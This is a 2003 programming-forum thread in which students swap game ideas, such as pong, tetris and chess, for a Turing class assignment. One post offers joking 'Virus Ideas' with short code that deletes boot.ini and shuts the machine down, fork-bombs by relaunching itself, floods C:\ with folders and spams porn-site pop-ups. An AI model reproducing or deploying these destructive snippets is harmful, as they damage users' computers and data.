Programming C, C++, Java, PHP, Ruby, Turing, VB
Computer Science Canada 
Programming C, C++, Java, PHP, Ruby, Turing, VB  

Username:   Password: 
 RegisterRegister   
 GAME IDEAS- Check Here First if you need some!!!!
Index -> Programming, Turing -> Turing Help
Goto page 1, 2, 3 ... 10, 11, 12  Next
View previous topic Printable versionDownload TopicSubscribe to this topicPrivate MessagesRefresh page View next topic
Author Message
void




PostPosted: Sun May 25, 2003 12:46 pm   Post subject: GAME IDEAS- Check Here First if you need some!!!!

I realized that since the ISP or 30% summative assignments are coming up, alot of people are going to post requests for game ideas, so instead of that spamming your site, i have decided to start a thread for people who wish to suggest games, post anything u want, it doesnt have to be a game, it can be any program that you think is make-able, (everything is makeable)

My Ideas
-----------
-pong
-streetfighter type game
-mario (very excellent if you can get the sfx going too)
-OS (a simple operating system with a word processor and paint program)
-Chess (if your advanced enough to program the ai, or else do a two player chess)
-pokemon type game (birds eye view RPG)
-any RTS like command and conquer or warcraft is good
-racing game (if u wanna make it 3D use catalyst 3D engine NOT RAYCASTING, raycasting is very ugly and can lead to fatal seizures j/k, i just thinks its crappy)
-button masher!!!
-whack-a-mole
-BEST GAME TO REMAKE: CASTLEVANIA...oh memories...
-robotron type shoot out
-those crossing the road with crazy traffic games
-cannonball (you aim the cannon at different angles and try to hit the computers cannon, requires trajectory knowledge)
--------------------------------------------------------------------------------------
thats all for now
Sponsor
Sponsor
Sponsor
sponsor
JSBN




PostPosted: Sun May 25, 2003 12:53 pm   Post subject: (No subject)

i'm actually making a cannons game right now for my ISU. Lets just say.... I have about 3 weeks worth of programming to do in 1.
Just ask Asok.... he'd probly agree with my delemma
Catalyst




PostPosted: Sun May 25, 2003 1:24 pm   Post subject: (No subject)

some other that are worth metioning:

-tetris
-asteroids
-breakout
-pac man
-snake
-golf
Prince




PostPosted: Sun May 25, 2003 3:41 pm   Post subject: (No subject)

i was actually thinkin of makin snake a while ago but i hav no idea wher to start... might actually b easier than makin bricks which is wat im doin rite now
void




PostPosted: Sun May 25, 2003 4:04 pm   Post subject: (No subject)

WOW!!! it's become a sticky!!! I feel so...so...honoured **wipes tear off eyes** lolz...so yea...some "program" ideas:

-solitaire (not too hard...the hard part is making the cards)
-any board game like trouble/ sorry/ monopoly/ risk
-minesweeper (actualy very easy to make)
-checkers
-SPACESHOOTER
-push-push (the hard part is making the puzzle solvable, i suggest using one of the previously available puzzles online)
-maze
- more on the way.....
Martin




PostPosted: Sun May 25, 2003 6:14 pm   Post subject: (No subject)

Virus Ideas.
-Make a program that deletes boot.ini and turns off your computer.
code:
Dir.Change ("C:\\")
File.Delete("boot.ini")
put Sys.Exec ("C:\\Windows\\Shutdown.exe")
%Goodbye computer

-Make a program that runs itself. Over and over and over (you've got to compile it to do this)
code:
loop
    put Sys.Exec ("ThisFile.Exe")
end loop

Your computer will lock up like a nervous virgin on prom night.
-Make a bunch of folders
code:
Dir.Change("C:\\")
for i:1..maxint
    Dir.Create (intstr(i))
end for


-Fun with pop up windows.
code:
var site : array 1..whatever of string := init ("www.porn.com", a bunch more porn sites)
loop
   if Sys.Exec (site (Rand.Int(1,upper(site)))) then
   end if
end loop


Make a collection of these for an...'alternet' ISU Twisted Evil
Martin




PostPosted: Sun May 25, 2003 6:18 pm   Post subject: (No subject)

Now for a legitimate idea. Make Civilization. I am Very Happy
JSBN




PostPosted: Sun May 25, 2003 6:36 pm   Post subject: (No subject)

but now you've got a problem Drakness, no one will want to download/ play your game for an obvious reason.....
Sponsor
Sponsor
Sponsor
sponsor
Asok




PostPosted: Sun May 25, 2003 8:36 pm   Post subject: (No subject)

JSBN wrote:
i'm actually making a cannons game right now for my ISU. Lets just say.... I have about 3 weeks worth of programming to do in 1.
Just ask Asok.... he'd probly agree with my delemma


yea, JSBN is rather f***ked. It'll be interesting to see what he can actually pull off. He'll still pass the ISP, and probably with a reasonably high mark (90ish) because half the class hasn't started.
kythoon




PostPosted: Sun May 25, 2003 8:36 pm   Post subject: (No subject)

and what would that be JSBN?

IDEAS:

blackjack
poker
monopoly
hockey
hearts
connect 4


all pretty easy games (not monopoly)
JSBN




PostPosted: Sun May 25, 2003 8:39 pm   Post subject: (No subject)

i'm making cannons (the old DOS game). I gunna post the crap that i have done so far.
void




PostPosted: Mon May 26, 2003 9:00 pm   Post subject: (No subject)

is that the only program everyone wants to make???...that was my first choice..then i realized that im much to stupid for that....lolz joke...im gonna make and OS..(simple word processor and paint..and maybe ill incorporate a little printing action)
Tony




PostPosted: Mon May 26, 2003 9:12 pm   Post subject: (No subject)

damn it, I've posted it already... OS is what is used to communicate between programs and hardware. You know window's APIs?! Thats what programs use to do stuff... A word processor and a paint program is not an OS, its an office package.

plz dont confuse MS Windows and MS Office... they are DIFFERENT.
Latest from compsci.ca/blog: Tony's programming blog. DWITE - a programming contest.
void




PostPosted: Mon May 26, 2003 9:21 pm   Post subject: (No subject)

yea..i know that...im just explaining what my operating system will offer as its package, like WINDOWS comes with IE and paint and WordPad...and other bs like that...dont worry...i am not an idiot
(i regret that comment)....lolz
void




PostPosted: Wed May 28, 2003 6:28 pm   Post subject: (No subject)

R.I.P
Display posts from previous:   
   Index -> Programming, Turing -> Turing Help
View previous topic Tell A FriendPrintable versionDownload TopicSubscribe to this topicPrivate MessagesRefresh page View next topic

Page 1 of 12  [ 177 Posts ]
Goto page 1, 2, 3 ... 10, 11, 12  Next
Jump to:   


Style:  
Search: